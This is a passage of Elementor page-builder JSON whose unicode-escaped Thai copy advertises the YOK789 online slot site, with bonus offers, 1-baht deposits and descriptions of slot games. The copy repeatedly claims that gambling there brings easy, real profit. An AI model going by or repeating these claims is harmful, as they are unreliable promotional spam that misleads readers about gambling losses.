\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 <strong>\\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong> \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Mahjong Ways<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Mahjong Ways \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e44\\u0e1e\\u0e48\\u0e19\\u0e01\\u0e01\\u0e23\\u0e30\\u0e08\\u0e2d\\u0e01\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e15\\u0e01\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e35\\u0e22\\u0e07\\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e2b\\u0e25\\u0e22\\u0e32\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e04\\u0e2d\\u0e21\\u0e42\\u0e1a \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e08\\u0e35\\u0e19\\u0e42\\u0e1a\\u0e23\\u0e32\\u0e13\\u0e14\\u0e39\\u0e41\\u0e1e\\u0e07\\u0e41\\u0e15\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e01\\u0e21\\u0e44\\u0e21\\u0e48\\u0e40\\u0e23\\u0e47\\u0e27\\u0e40\\u0e01\\u0e34\\u0e19\\u0e44\\u0e1b\\u0e08\\u0e36\\u0e07\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e14\\u0e39\\u0e17\\u0e23\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e0a\\u0e19\\u0e30\\u0e15\\u0e34\\u0e14\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e15\\u0e31\\u0e27 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e1b\\u0e34\\u0e14\\u0e08\\u0e1a\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e19\\u0e31\\u0e01 \\u0e46 \\u0e08\\u0e30\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 